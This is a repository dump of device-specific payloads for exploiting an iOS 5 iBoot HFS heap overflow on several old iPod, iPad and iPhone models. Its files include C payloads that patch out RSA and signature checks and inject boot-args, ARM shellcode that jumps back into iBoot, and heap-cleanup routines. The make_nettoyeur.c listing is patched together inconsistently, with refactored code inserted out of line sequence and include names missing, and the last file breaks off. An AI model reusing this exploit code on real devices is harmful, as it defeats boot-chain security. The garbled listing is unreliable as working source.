├── iPod4,1 └── 8J2 │ ├── ramdiskG.dmg │ ├── netto │ ├── Makefile │ └── nettoyeur.c │ ├── prepare_and_jump │ ├── Makefile │ └── prepare_and_jump.S │ ├── Makefile │ └── payload.c ├── iPad1,1 └── 9B206 │ ├── ramdiskG.dmg │ ├── ramdiskH.dmg │ ├── netto │ ├── Makefile │ └── nettoyeur.c │ ├── prepare_and_jump.S │ ├── Makefile │ ├── payload_ramdiskH.c │ └── payload.c ├── iPod2,1 └── 8C148 │ ├── ramdiskG.dmg │ ├── netto │ ├── Makefile │ └── nettoyeur.c │ ├── Makefile │ ├── prepare_and_jump │ ├── Makefile │ └── prepare_and_jump.S │ └── payload.c ├── iPhone2,1 └── 9B206 │ ├── ramdiskG.dmg │ ├── netto │ ├── Makefile │ └── nettoyeur.c │ ├── Makefile │ ├── prepare_and_jump.S │ └── payload.c ├── iPhone4,1 └── 9B206 │ ├── ramdiskG.dmg │ ├── netto │ ├── Makefile │ └── nettoyeur.c │ ├── Makefile │ ├── prepare_and_jump.S │ └── payload.c ├── README.md └── make_nettoyeur.c /iPod4,1/8J2/ramdiskG.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ralph0045/iBoot-5-Stuff/HEAD/iPod4,1/8J2/ramdiskG.dmg -------------------------------------------------------------------------------- /iPad1,1/9B206/ramdiskG.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ralph0045/iBoot-5-Stuff/HEAD/iPad1,1/9B206/ramdiskG.dmg -------------------------------------------------------------------------------- /iPad1,1/9B206/ramdiskH.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ralph0045/iBoot-5-Stuff/HEAD/iPad1,1/9B206/ramdiskH.dmg -------------------------------------------------------------------------------- /iPod2,1/8C148/ramdiskG.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ralph0045/iBoot-5-Stuff/HEAD/iPod2,1/8C148/ramdiskG.dmg -------------------------------------------------------------------------------- 
/iPhone2,1/9B206/ramdiskG.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ralph0045/iBoot-5-Stuff/HEAD/iPhone2,1/9B206/ramdiskG.dmg -------------------------------------------------------------------------------- /iPhone4,1/9B206/ramdiskG.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ralph0045/iBoot-5-Stuff/HEAD/iPhone4,1/9B206/ramdiskG.dmg -------------------------------------------------------------------------------- /iPad1,1/9B206/netto/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc -c -Os nettoyeur.c 3 | arm-none-eabi-objcopy -O binary nettoyeur.o nettoyeur.bin -------------------------------------------------------------------------------- /iPhone2,1/9B206/netto/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc -c -Os nettoyeur.c 3 | arm-none-eabi-objcopy -O binary nettoyeur.o nettoyeur.bin -------------------------------------------------------------------------------- /iPhone4,1/9B206/netto/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc -c -Os nettoyeur.c 3 | arm-none-eabi-objcopy -O binary nettoyeur.o nettoyeur.bin -------------------------------------------------------------------------------- /iPod4,1/8J2/netto/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc -c -Os nettoyeur.c 3 | arm-none-eabi-objcopy -O binary nettoyeur.o nettoyeur.bin 4 | rm nettoyeur.o 5 | -------------------------------------------------------------------------------- /iPod2,1/8C148/netto/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc -march=armv6 -c -Os nettoyeur.c 3 | 
arm-none-eabi-objcopy -O binary nettoyeur.o nettoyeur.bin 4 | rm nettoyeur.o 5 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Some stuff that can be useful for exploiting the iOS 5 HFS heap buffer overflow iBoot bug 2 | 3 | ## Credits/Thanks 4 | * p0sixninja 5 | * nyan_satan 6 | * JonathanSeals 7 | -------------------------------------------------------------------------------- /iPod4,1/8J2/prepare_and_jump/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-as -mthumb --fatal-warnings -o prepare_and_jump.o prepare_and_jump.S 3 | arm-none-eabi-objcopy -O binary prepare_and_jump.o prepare_and_jump.bin 4 | rm prepare_and_jump.o 5 | -------------------------------------------------------------------------------- /iPod2,1/8C148/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc payload.c -fpie -W -pedantic -Wno-long-long -Os -L. -nostdlib -emain -march=armv6 -mthumb -o payload.elf 3 | arm-none-eabi-objcopy -O binary payload.elf payload.bin 4 | rm payload.elf 5 | -------------------------------------------------------------------------------- /iPod4,1/8J2/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc payload.c -fpie -W -pedantic -Wno-long-long -Os -L. 
-nostdlib -emain -march=armv7-a -mthumb -o payload.elf 3 | arm-none-eabi-objcopy -O binary payload.elf payload.bin 4 | rm payload.elf 5 | -------------------------------------------------------------------------------- /iPod2,1/8C148/prepare_and_jump/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-as -march=armv6 --fatal-warnings -o prepare_and_jump.o prepare_and_jump.S 3 | arm-none-eabi-objcopy -O binary prepare_and_jump.o prepare_and_jump.bin 4 | rm prepare_and_jump.o 5 | -------------------------------------------------------------------------------- /iPhone2,1/9B206/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-as -mthumb --fatal-warnings -o prepare_and_jump.o prepare_and_jump.S 3 | arm-none-eabi-objcopy -O binary prepare_and_jump.o prepare_and_jump.bin 4 | arm-none-eabi-gcc payload.c -fpie -W -pedantic -Wno-long-long -Os -L. -nostdlib -emain -march=armv7-a -mthumb -o payload.elf 5 | arm-none-eabi-objcopy -O binary payload.elf payload.bin -------------------------------------------------------------------------------- /iPhone4,1/9B206/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-as -mthumb --fatal-warnings -o prepare_and_jump.o prepare_and_jump.S 3 | arm-none-eabi-objcopy -O binary prepare_and_jump.o prepare_and_jump.bin 4 | arm-none-eabi-gcc payload.c -fpie -W -pedantic -Wno-long-long -Os -L. 
-nostdlib -emain -march=armv7-a -mthumb -o payload.elf 5 | arm-none-eabi-objcopy -O binary payload.elf payload.bin -------------------------------------------------------------------------------- /iPad1,1/9B206/prepare_and_jump.S: -------------------------------------------------------------------------------- 1 | @ shellcode from iloader source, thanks xerub 2 | .text 3 | .syntax unified 4 | 5 | .org 0x16f00 6 | .thumb 7 | .thumb_func 8 | _cache_stuff: 9 | bx lr 10 | 11 | .org 0x307FC 12 | .global _prepare_and_jump 13 | .thumb 14 | .thumb_func 15 | _prepare_and_jump: 16 | ldr sp, =0x5FFF8000 17 | bl _cache_stuff 18 | ldr r4, =0x44000000 19 | bx r4 @ reload iBoot 20 | -------------------------------------------------------------------------------- /iPhone2,1/9B206/prepare_and_jump.S: -------------------------------------------------------------------------------- 1 | @ shellcode from iloader source, thanks xerub 2 | .text 3 | .syntax unified 4 | 5 | .org 0x15514 6 | .thumb 7 | .thumb_func 8 | _cache_stuff: 9 | bx lr 10 | 11 | .org 0x2D64C 12 | .global _prepare_and_jump 13 | .thumb 14 | .thumb_func 15 | _prepare_and_jump: 16 | ldr sp, =0x4FFF8000 17 | bl _cache_stuff 18 | ldr r4, =0x44000000 19 | bx r4 @ reload iBoot 20 | -------------------------------------------------------------------------------- /iPhone4,1/9B206/prepare_and_jump.S: -------------------------------------------------------------------------------- 1 | @ shellcode from iloader source, thanks xerub 2 | .text 3 | .syntax unified 4 | 5 | .org 0x1C604 6 | .thumb 7 | .thumb_func 8 | _cache_stuff: 9 | bx lr 10 | 11 | .org 0x3CA9C 12 | .global _prepare_and_jump 13 | .thumb 14 | .thumb_func 15 | _prepare_and_jump: 16 | ldr sp, =0x9FFF8000 17 | bl _cache_stuff 18 | ldr r4, =0x84000000 19 | bx r4 @ reload iBoot 20 | -------------------------------------------------------------------------------- /iPod4,1/8J2/prepare_and_jump/prepare_and_jump.S: 
-------------------------------------------------------------------------------- 1 | @ shellcode from iloader source, thanks xerub 2 | .text 3 | .syntax unified 4 | 5 | .org 0x173E0 6 | .thumb 7 | .thumb_func 8 | _cache_stuff: 9 | bx lr 10 | 11 | .org 0x37878 12 | .global _prepare_and_jump 13 | .thumb 14 | .thumb_func 15 | _prepare_and_jump: 16 | ldr sp, =0x5FFF8000 17 | bl _cache_stuff 18 | ldr r4, =0x44000000 19 | bx r4 @ reload iBoot 20 | -------------------------------------------------------------------------------- /iPod2,1/8C148/prepare_and_jump/prepare_and_jump.S: -------------------------------------------------------------------------------- 1 | @ shellcode from iloader source, thanks xerub 2 | .text 3 | .syntax unified 4 | 5 | .org 0xF072 6 | .thumb 7 | .thumb_func 8 | _cache_stuff: 9 | bx lr 10 | 11 | .org 0x283D8 12 | .global _prepare_and_jump 13 | .thumb 14 | .thumb_func 15 | _prepare_and_jump: 16 | ldr r0, =0xFFF7800 17 | mov sp, r0 18 | bl _cache_stuff 19 | ldr r0, =0x0B000000 20 | bx r0 @ reload iBoot 21 | -------------------------------------------------------------------------------- /iPad1,1/9B206/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-as -mthumb --fatal-warnings -o prepare_and_jump.o prepare_and_jump.S 3 | arm-none-eabi-objcopy -O binary prepare_and_jump.o prepare_and_jump.bin 4 | arm-none-eabi-gcc payload.c -fpie -W -pedantic -Wno-long-long -Os -L. -nostdlib -emain -march=armv7-a -mthumb -o payload.elf 5 | arm-none-eabi-objcopy -O binary payload.elf payload.bin 6 | arm-none-eabi-gcc payload_ramdiskH.c -fpie -W -pedantic -Wno-long-long -Os -L. 
-nostdlib -emain -march=armv7-a -mthumb -o payload_ramdiskH.elf 7 | arm-none-eabi-objcopy -O binary payload_ramdiskH.elf payload_ramdiskH.bin -------------------------------------------------------------------------------- /iPhone4,1/9B206/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BASE_ADDR 0x9FF00000 4 | #define TARGET_JUMPADDR 0x84000000 5 | #define PRINTF (0x2ca8c+0x1) 6 | #define BCOPY (0x2cdd4) 7 | #define NETTOYEUR (0x3CACC) 8 | #define PREPARE_AND_JUMP (0x3CA9D) 9 | 10 | typedef void (*printf_t)(const char *fmt, ...); 11 | typedef void (*bcopy_t)(const void *src, void *dest, size_t n); 12 | typedef void (*nettoyeur_t)(void); 13 | typedef void (*prepare_and_jump_t)(void); 14 | 15 | int main() { 16 | 17 | printf_t printf = (printf_t)(BASE_ADDR+PRINTF); 18 | bcopy_t bcopy = (bcopy_t)(BASE_ADDR+BCOPY); 19 | nettoyeur_t nettoyeur = (nettoyeur_t)(BASE_ADDR+NETTOYEUR); 20 | prepare_and_jump_t prepare_and_jump = (prepare_and_jump_t)(BASE_ADDR+PREPARE_AND_JUMP); 21 | 22 | printf("Hacked\n"); 23 | 24 | bcopy((void*)0x9FF00000,(void*)TARGET_JUMPADDR,(size_t)0x3A000); 25 | 26 | nettoyeur(); 27 | 28 | /* iBoot Patches - ramdiskG */ 29 | 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x16254) = 0x60182000; // RSA checks 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x174c4) = 0x4995FAC9; 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x31e1c) = 0x762D00; // boot-args="-v" 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x376bc) = 0x80000000; // ticket=loadaddr 34 | 35 | /* ---------------------------------------------------- */ 36 | 37 | printf("Jumping into image at %p\n",TARGET_JUMPADDR); 38 | 39 | prepare_and_jump(); 40 | 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /iPad1,1/9B206/payload_ramdiskH.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BASE_ADDR 0x5ff00000 4 | #define 
TARGET_JUMPADDR 0x44000000 5 | #define PRINTF (0x2342c+0x1) 6 | #define BCOPY (0x23774) 7 | #define NETTOYEUR (0x3086C) 8 | #define PREPARE_AND_JUMP (0x307FD) 9 | 10 | typedef void (*printf_t)(const char *fmt, ...); 11 | typedef void (*bcopy_t)(const void *src, void *dest, size_t n); 12 | typedef void (*nettoyeur_t)(void); 13 | typedef void (*prepare_and_jump_t)(void); 14 | 15 | int main() { 16 | 17 | printf_t printf = (printf_t)(BASE_ADDR+PRINTF); 18 | bcopy_t bcopy = (bcopy_t)(BASE_ADDR+BCOPY); 19 | nettoyeur_t nettoyeur = (nettoyeur_t)(BASE_ADDR+NETTOYEUR); 20 | prepare_and_jump_t prepare_and_jump = (prepare_and_jump_t)(BASE_ADDR+PREPARE_AND_JUMP); 21 | 22 | printf("Hacked\n"); 23 | 24 | bcopy((void*)0x5FF00000,(void*)TARGET_JUMPADDR,(size_t)0x2E000); 25 | 26 | nettoyeur(); 27 | 28 | /* iBoot Patches - ramdiskH */ 29 | 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x012A8) = 0x20009902; // boot-target=0 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x110d4) = 0x60182000; // RSA checks 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x245bc) = 0x66003000; // boot-partition=0 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d004) = 0x5FF01249; // boot-command=upgrade 34 | 35 | /* ---------------------------------------------------- */ 36 | 37 | printf("Jumping into image at %p\n",TARGET_JUMPADDR); 38 | 39 | prepare_and_jump(); 40 | 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /iPad1,1/9B206/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BASE_ADDR 0x5ff00000 4 | #define TARGET_JUMPADDR 0x44000000 5 | #define PRINTF (0x2342c+0x1) 6 | #define BCOPY (0x23774) 7 | #define NETTOYEUR (0x3086C) 8 | #define PREPARE_AND_JUMP (0x307FD) 9 | 10 | typedef void (*printf_t)(const char *fmt, ...); 11 | typedef void (*bcopy_t)(const void *src, void *dest, size_t n); 12 | typedef void (*nettoyeur_t)(void); 13 | typedef void (*prepare_and_jump_t)(void); 14 | 15 | int 
main() { 16 | 17 | printf_t printf = (printf_t)(BASE_ADDR+PRINTF); 18 | bcopy_t bcopy = (bcopy_t)(BASE_ADDR+BCOPY); 19 | nettoyeur_t nettoyeur = (nettoyeur_t)(BASE_ADDR+NETTOYEUR); 20 | prepare_and_jump_t prepare_and_jump = (prepare_and_jump_t)(BASE_ADDR+PREPARE_AND_JUMP); 21 | 22 | printf("Hacked\n"); 23 | 24 | bcopy((void*)0x5FF00000,(void*)TARGET_JUMPADDR,(size_t)0x2E000); 25 | 26 | nettoyeur(); 27 | 28 | /* iBoot Patches - ramdiskG */ 29 | 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x00818) = 0x20002100; 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x0081c) = 0xf10d2000; 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x008e0) = 0x20002000; 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x110d4) = 0x60182000; 34 | *(unsigned int *)(TARGET_JUMPADDR + 0x12344) = 0x4995fbf7; 35 | *(unsigned int *)(TARGET_JUMPADDR + 0x274a0) = 0x00762d00; 36 | 37 | /* ---------------------------------------------------- */ 38 | 39 | printf("Jumping into image at %p\n",TARGET_JUMPADDR); 40 | 41 | prepare_and_jump(); 42 | 43 | return 0; 44 | } 45 | -------------------------------------------------------------------------------- /iPhone2,1/9B206/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BASE_ADDR 0x4FF00000 4 | #define TARGET_JUMPADDR 0x44000000 5 | #define PRINTF (0x21928+0x1) 6 | #define BCOPY (0x21C70) 7 | #define NETTOYEUR (0x2D67C) 8 | #define PREPARE_AND_JUMP (0x2D64D) 9 | 10 | typedef void (*printf_t)(const char *fmt, ...); 11 | typedef void (*bcopy_t)(const void *src, void *dest, size_t n); 12 | typedef void (*nettoyeur_t)(void); 13 | typedef void (*prepare_and_jump_t)(void); 14 | 15 | int main() { 16 | 17 | printf_t printf = (printf_t)(BASE_ADDR+PRINTF); 18 | bcopy_t bcopy = (bcopy_t)(BASE_ADDR+BCOPY); 19 | nettoyeur_t nettoyeur = (nettoyeur_t)(BASE_ADDR+NETTOYEUR); 20 | prepare_and_jump_t prepare_and_jump = (prepare_and_jump_t)(BASE_ADDR+PREPARE_AND_JUMP); 21 | 22 | printf("Hacked\n"); 23 | 24 | 
bcopy((void*)0x4FF00000,(void*)TARGET_JUMPADDR,(size_t)0x2B000); 25 | 26 | nettoyeur(); 27 | 28 | /* iBoot Patches - ramdiskG */ 29 | 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x818) = 0x20002100; // ignore boot-partition 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x81c) = 0xF10D2000; // ignore boot-partition 32 | *(unsigned int *)(TARGET_JUMPADDR + 0xf884) = 0x60182000; // RSA Checks 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x24e14) = 0x6D00762D; // boot-args="-v" 34 | *(unsigned int *)(TARGET_JUMPADDR + 0x28cac) = 0x40000000; // ticket=loadaddress 35 | 36 | /* ---------------------------------------------------- */ 37 | 38 | printf("Jumping into image at %p\n",TARGET_JUMPADDR); 39 | 40 | prepare_and_jump(); 41 | 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /iPod2,1/8C148/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BASE_ADDR 0x0ff00000 4 | #define TARGET_JUMPADDR 0x0B000000 5 | #define PRINTF (0x1CAAC+0x1) 6 | #define BCOPY (0x1cc98) 7 | #define NETTOYEUR (0x28428) 8 | #define PREPARE_AND_JUMP (0x283D9) 9 | 10 | typedef void (*printf_t)(const char *fmt, ...); 11 | typedef void (*bcopy_t)(const void *src, void *dest, size_t n); 12 | typedef void (*nettoyeur_t)(void); 13 | typedef void (*prepare_and_jump_t)(void); 14 | 15 | int main() { 16 | 17 | printf_t printf = (printf_t)(BASE_ADDR+PRINTF); 18 | bcopy_t bcopy = (bcopy_t)(BASE_ADDR+BCOPY); 19 | nettoyeur_t nettoyeur = (nettoyeur_t)(BASE_ADDR+NETTOYEUR); 20 | prepare_and_jump_t prepare_and_jump = (prepare_and_jump_t)(BASE_ADDR+PREPARE_AND_JUMP); 21 | 22 | printf("Hacked\n"); 23 | 24 | bcopy((void*)0xFF00000,(void*)TARGET_JUMPADDR,(size_t)0x27000); 25 | 26 | nettoyeur(); 27 | 28 | /* iBoot Patches - ramdiskG */ 29 | 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x94c4) = 0x47702000; // Signature checks patch 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x12aec) = 0x2000E036; // Signature 
checks patch 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x12af0) = 0xE0332000; // Signature checks patch 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x1ee68) = 0x6D00762D; // nvram boot-args="-v" 34 | *(unsigned int *)(TARGET_JUMPADDR + 0xa0f0) = 0x2C006813; // Inject boot args 35 | 36 | /* ---------------------------------------------------- */ 37 | 38 | printf("Jumping into image at %p\n",TARGET_JUMPADDR); 39 | 40 | prepare_and_jump(); 41 | 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /iPod4,1/8J2/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BASE_ADDR 0x5ff00000 4 | #define TARGET_JUMPADDR 0x44000000 5 | #define PRINTF (0x28B2C+0x1) 6 | #define BCOPY (0x28d4c) 7 | #define CLEAR_INSN_CACHE (0x17090) 8 | #define NETTOYEUR (0x378A8) 9 | #define PREPARE_AND_JUMP (0x37879) 10 | 11 | typedef void (*printf_t)(const char *fmt, ...); 12 | typedef void (*bcopy_t)(const void *src, void *dest, size_t n); 13 | typedef void (*clear_insn_cache_t)(void); 14 | typedef void (*nettoyeur_t)(void); 15 | typedef void (*prepare_and_jump_t)(void); 16 | 17 | int main() { 18 | 19 | printf_t printf = (printf_t)(BASE_ADDR+PRINTF); 20 | bcopy_t bcopy = (bcopy_t)(BASE_ADDR+BCOPY); 21 | clear_insn_cache_t clear_insn_cache = (clear_insn_cache_t)(BASE_ADDR+CLEAR_INSN_CACHE); 22 | nettoyeur_t nettoyeur = (nettoyeur_t)(BASE_ADDR+NETTOYEUR); 23 | prepare_and_jump_t prepare_and_jump = (prepare_and_jump_t)(BASE_ADDR+PREPARE_AND_JUMP); 24 | 25 | clear_insn_cache(); 26 | 27 | printf("Hacked\n"); 28 | 29 | bcopy((void*)0x5FF00000,(void*)TARGET_JUMPADDR,(size_t)0x35000); 30 | 31 | nettoyeur(); 32 | 33 | /* iBoot Patches - ramdiskG */ 34 | 35 | *(unsigned int *)(TARGET_JUMPADDR + 0x120dc) = 0x20002000; // Signature checks 36 | *(unsigned int *)(TARGET_JUMPADDR + 0x1216c) = 0x200049B9; // Signature checks 37 | *(unsigned int *)(TARGET_JUMPADDR + 0x12170) = 0x46042000; // 
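Signature checks 38 | *(unsigned int *)(TARGET_JUMPADDR + 0x121b0) = 0x20002000; // Signature checks 39 | *(unsigned int *)(TARGET_JUMPADDR + 0x121d4) = 0x20002000; // Signature checks 40 | *(unsigned int *)(TARGET_JUMPADDR + 0x1a7e0) = 0x20002000; // Signature checks 41 | *(unsigned int *)(TARGET_JUMPADDR + 0x12d90) = 0x20012020; // debug-enabled 42 | *(unsigned int *)(TARGET_JUMPADDR + 0x12d94) = 0xB1102001; // debug-enabled 43 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d9c4) = 0x6D00762D; // nvram boot-args="-v" 44 | *(unsigned int *)(TARGET_JUMPADDR + 0x12a3c) = 0x290107A8; // inject boot-args 45 | *(unsigned int *)(TARGET_JUMPADDR + 0x29880) = 0x746F; // ignore boot-partition variable 46 | 47 | /* ---------------------------------------------------- */ 48 | 49 | printf("Jumping into image at %p\n",TARGET_JUMPADDR); 50 | 51 | prepare_and_jump(); 52 | 53 | return 0; 54 | } 55 | -------------------------------------------------------------------------------- /make_nettoyeur.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2020, @Ralph0045 3 | * gcc make_nettoyeur.c -o make_nettoyeur 4 | */ 5 | 6 | #include 7 | #include 8 | 9 | #define TARGET_JUMPADDR 0x44000000 10 |
/*
 * Read the whole file at `path` into a freshly allocated buffer.
 *
 * On success returns the buffer (the caller frees it) and stores the file
 * size in *len_out. On failure prints a message and returns NULL.
 */
static void *read_image(const char *path, size_t *len_out) {
    FILE *fp = fopen(path, "rb");
    if (!fp) {
        printf("Error opening %s!\n", path);
        return NULL;
    }

    /* ftell() returns -1 on failure; never let that become a huge size_t. */
    long end = -1;
    if (fseek(fp, 0, SEEK_END) == 0) {
        end = ftell(fp);
    }
    if (end < 0 || fseek(fp, 0, SEEK_SET) != 0) {
        printf("Error reading %s!\n", path);
        fclose(fp);
        return NULL;
    }

    size_t len = (size_t)end;
    /* malloc(0) may legitimately return NULL, so always ask for one byte. */
    void *buf = malloc(len ? len : 1);
    if (!buf) {
        printf("Out of memory!\n");
        fclose(fp);
        return NULL;
    }

    /* A short read would leave the tail of the buffer uninitialized. */
    if (fread(buf, 1, len, fp) != len) {
        printf("Error reading %s!\n", path);
        free(buf);
        fclose(fp);
        return NULL;
    }

    fclose(fp);
    *len_out = len;
    return buf;
}

/*
 * Compare the file named by argv[1] with the file named by argv[2] one
 * 32-bit word at a time and write "nettoyeur.c": a C source file holding one
 * store per differing word, each storing the value found in argv[1] at
 * TARGET_JUMPADDR plus the word's byte offset.
 *
 * Returns 0 on success or when only the usage text is printed, -1 on error.
 *
 * NOTE(review): in this listing the "#include" literal below and the usage
 * text carry no operand; anything in angle brackets appears to have been
 * stripped. Restore both from the upstream file.
 */
int main(int argc, char **argv) {
    const char *out_path = "nettoyeur.c";
    uint32_t *iboot_orig_buf = NULL;
    uint32_t *dumped_iboot_buf = NULL;
    size_t iboot_orig_len = 0;
    size_t dumped_iboot_len = 0;
    size_t words = 0;
    FILE *fo = NULL;
    int rc = -1;

    if (argc < 3) {
        printf("Usage: %s \n", argv[0]);
        return 0;
    }

    // dec iBoot
    iboot_orig_buf = read_image(argv[1], &iboot_orig_len);
    if (!iboot_orig_buf) {
        goto out;
    }

    // dumped iBoot
    dumped_iboot_buf = read_image(argv[2], &dumped_iboot_len);
    if (!dumped_iboot_buf) {
        goto out;
    }

    if (iboot_orig_len != dumped_iboot_len) {
        printf("Error: size doesn't match!\n");
        goto out;
    }

    /*
     * The comparison walks whole 32-bit words. A length that is not a
     * multiple of 4 used to run the loop past the end of both buffers.
     */
    if (iboot_orig_len % sizeof(uint32_t) != 0) {
        printf("Error: size is not a multiple of 4!\n");
        goto out;
    }

    fo = fopen(out_path, "w");
    if (!fo) {
        printf("Error opening %s!\n", out_path);
        goto out;
    }

    fprintf(fo, "#include \n\n");
    fprintf(fo, "#define TARGET_JUMPADDR %p\n\n", (void *)TARGET_JUMPADDR);
    fprintf(fo, "int\nmain (void)\n{\n\n");

    /* Words are read in host byte order, as in the original loop. */
    words = iboot_orig_len / sizeof(uint32_t);
    for (size_t w = 0; w < words; w++) {
        if (iboot_orig_buf[w] != dumped_iboot_buf[w]) {
            fprintf(fo, "\t*(unsigned int *)(TARGET_JUMPADDR + 0x%x) = 0x%02X;",
                    (unsigned)(w * sizeof(uint32_t)), (unsigned)iboot_orig_buf[w]);
            fprintf(fo, "\n");
        }
    }

    fprintf(fo, "\n\treturn 0;\n");
    fprintf(fo, "}\n");

    /* fclose() flushes; a failure here means the output file is incomplete. */
    if (fclose(fo) != 0) {
        printf("Error writing %s!\n", out_path);
        goto out;
    }

    printf("Wrote nettoyeur\n");
    rc = 0;

out:
    free(dumped_iboot_buf);
    free(iboot_orig_buf);
    return rc;
}
95 | -------------------------------------------------------------------------------- /iPad1,1/9B206/netto/nettoyeur.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define TARGET_JUMPADDR 0x44000000 4 | 5 | int 6 | main(void) 7 | { 8 | 9 | unsigned i; 10 | 11 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d118) = 0x00000000; 12 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d11c) = 0x00000000; 13 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d12c) = 0x00000000; 14 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d128) = 0x00000000; 15 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d130) = 0x00000000; 16 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d1b8) = 0x00000000; 17 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d1bc) = 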
0x00000000; 18 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d1cc) = 0x00000000; 19 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d1d0) = 0x00000000; 20 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d280) = 0xFFFFFFFF; 21 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d28c) = 0x00000011; 22 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d290) = 0x5FF2D290; 23 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d294) = 0x5FF2D290; 24 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2d0) = 0x5FF2D2D0; 25 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2d4) = 0x5FF2D2D0; 26 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2d8) = 0x5FF2D2D8; 27 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2dc) = 0x5FF2D2D8; 28 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2e4) = 0xFFFFFFFF; 29 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2e8) = 0xFFFFFFFF; 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2ec) = 0x00000000; 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d300) = 0x5FF2D320; 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d310) = 0x5FF2D310; 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d314) = 0x5FF2D310; 34 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d318) = 0x5FF2D318; 35 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d31c) = 0x5FF2D318; 36 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d334) = 0x00000002; 37 | for (i = 0; i <= 0x2d388 - 0x2d33c; i += 4) { 38 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d33c + i) = 0x00000000; 39 | } 40 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d3b8) = 0xFFFFFFFF; 41 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d370) = 0x00004000; 42 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d374) = 0x00000000; 43 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d378) = 0x01000000; 44 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d900) = 0x00000000; 45 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d920) = 0x00000000; 46 | for (i = 0; i <= 0x2dbd0 - 0x2da80; i += 4) { 47 | *(unsigned int *)(TARGET_JUMPADDR + 0x2da80 + i) = 0x00000000; 48 | } 49 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d370) = 0x00000000; 50 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d378) = 0x00000000; 51 | 52 
